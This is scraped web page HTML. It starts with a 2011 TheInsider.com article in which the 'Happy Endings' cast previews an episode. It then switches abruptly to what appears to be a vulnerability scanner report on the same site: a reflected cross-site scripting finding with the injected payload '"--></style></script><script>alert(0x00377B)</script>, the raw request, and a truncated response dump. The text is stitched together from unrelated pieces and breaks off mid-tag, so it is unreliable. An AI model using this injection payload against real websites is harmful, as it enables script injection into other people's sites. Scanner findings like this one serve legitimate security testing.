Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/screen/screen.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/screen'><img src='/media/img/channel_page_name_screen.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"> <img src='/media/img/video_unavailable.jpg'> </div><p class='article'><h3>'Happy Endings' Cast Teases Lost Episode</h3><div class='contrib_cont'><div class='contrib_container'><img src='/media/contributor/bio_pic_jarrett_wieselman.jpg' style='float:left; margin-right: 5px; display:block;'><div class='byline contrib_by'>BY:</div><p class='byline' style='margin-bottom: 0px;'><div class='contrib_border'><div style='width: 100px; font-size: 12px; display: block; margin-top:8px;'>Jarett Wieselman</div><a style='position:left; font-size: 12px; margin-right: 5px; position: relative; top: 2px;' href='http://www.twitter.com/@JarettSays'>@JarettSays</a></div><img src='/media/contributor/tiwtter_post_sm.jpg' style='margin-left:5px; position: relative; top: 5px;'><p class='contrib_date1' style='margin:5px 10px; font-weight: bold;'>August 24, 2011</p><div class='clearfix'></div></div></div><p>
For a select group, <em>Happy Endings</em> was like a dirty little secret -- an under-the-radar slice of brilliance that spawned more inappropriate comments than a drunken family dinner. The good news is that this brilliantly absurd series got picked up for a second season. But the better news is that tonight delivers a brand new, never-before-seen episode!




</p><p>
Titled, <em>Why Can't You Read Me</em>, the episode revolves around ... well, why don't I let the cast explain it. &quot;Penny gets an assistant,&quot; Adam Pally (who plays Max) tells TheInsider.com. &quot;She wants to be the cool boss but at the same time, she keeps pocket dialing Max and I become obsessed with listening to her.&quot;




</p><p>
Elsewhere, Dave's dating life comes into focus. Literally. &quot;Dave makes a sex tape,&quot; Elisha Cuthbert (who plays Alex) laughs. &quot;But, just as you would expect, it doesn't go well.&quot; Further illuminating why his bang is such a bust, Zachary Knighton (who plays Dave) tells me, &quot;The sex tape is with a women’s lacrosse coach. There are no sticks involved but there is a lot of game video.&quot;




</p><p>
<em>Happy Endings </em>was very much on the bubble of renewal, so getting the second season pickup was quite a relief to the cast. Especially Zachary, who finally broke a longstanding streak. &quot;I've never been on a show that's gotten a second season before, so I was super stressed the day we were going to find out, but now I’m feeling pretty good.&quot; As is Elisha, who has learned to embrace her funny bone thanks to the series. &quot;I love, love, love the physical comedy. I love having rib sauce all over my face,&quot; she tells me. &quot;I put it out into the universe that I wanted to do comedy, but I can't believe how lucky I got. I am learning every moment of every day from this cast.&quot;




</p><p>
And now that they're a little more comfortable with the place on the network schedule, the cast and crew plans to go balls to the walls in season two. &quot;As bold and outrageous as the show was in season one, there was a sense of kid gloves,&quot; Adam tells Insider.com. &quot;They didn’t know if the public was ready for characters like these, but now that everyone has seen that they are, I can’t wait to turn up the volume even further. Especially with Max!&quot;




</p><p>
<em>Happy Endings</em> airs Wednesdays at 9:30 p.m. on ABC.




</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href='http://www.twitter.com/home?status=Happy+Endings+Cast+Talks+Season+Two+http://theinsider.com/p/?3hzpdh+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_..
- /thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_Shots_PICS/

/thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_Shots_PICS/

http://www.theinsider.com/thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_S..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00377B)</script>

Request

GET /thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_Shots_PICS/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_Shots_PICS/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:13:34 GMT
Content-Length: 16306
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Say What!? LeAnn Rimes Defends Too Skinny Claims with Bikini Shots [PICS]</title><meta name="description" content="" /><meta name="keywords" content="celebrity, celebrity skinny, eddie cibrain, gossip, leann rimes, too skinny celebrities " /><meta name="category" content="thelook" /><meta name="date" content="2011-07-05 17:00:00" /><meta property="og:title" content="Say What!? LeAnn Rimes Defends Too Skinny Claims with Bikini Shots [PICS]" /><meta property="og:type" content="tv_show" /><meta property="og:url" content="http://www.theinsider.com/thelook/42469_Say_What_LeAnn_Rimes_Defends_Too_Skinny_Claims_with_Bikini_Shots_PICS/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/07/76941/leann_rimes_cibrian_1_150.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="It's amazing she has enough energy to even tweet! Over the weekend, skinny minnie LeAnn Rimes lifted those bony fingers yet again to defend allegations that she's too skinny. How'd she do it? Well of course, by tweeting bikini pics of herself. Why do very thin celebs think that's the way to go!?CURVES…They are there LOL, she wrote of the pic standing with her backside to the camera.Really ... curves!? Where!? I'm still looking! Someone's gotta tell this skinny girl that simply tweeting washed out photos of yourself, saying you have curves -- doesn't actually give you curves. And while we are at it, someone should mention to the incredible shrinking woman that the only way to pack on those pounds is by eating a couple of burgers, or some slices of pizza or ... the contents of a candy store.For some reason, it seems as though LeAnn thinks taking to Twitter to blast photos of herself all over the web is the best way to defend the too skinny allegations. Back in March, the singer tweeted bikini shots while on her honeymoon in Cabo San Lucas with new hubby Eddie Cibrian. And that did anything but shut critics up. Ever since news of her affair with Cibrian, her co-star in the Lifetime channel movie Northern Lights, LeAnn has been all over the gossip rags. People don't seem to know what to make of the squeaky clean country gal being an alleged home wrecker. The affair-turned-marriage combined with apparent weight loss has caused LeAnn's name to be all over the news in recent years.My advice: don't defend yourself with teeny weeny photos, people are just gonna see skin and bones. Just eat some food and enjoy your hot husband." /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-07-05 17:00:00" /> <Attribute name="sdate" value="20110705" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/07/76941/leann_rimes_cibrian_1_150.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modif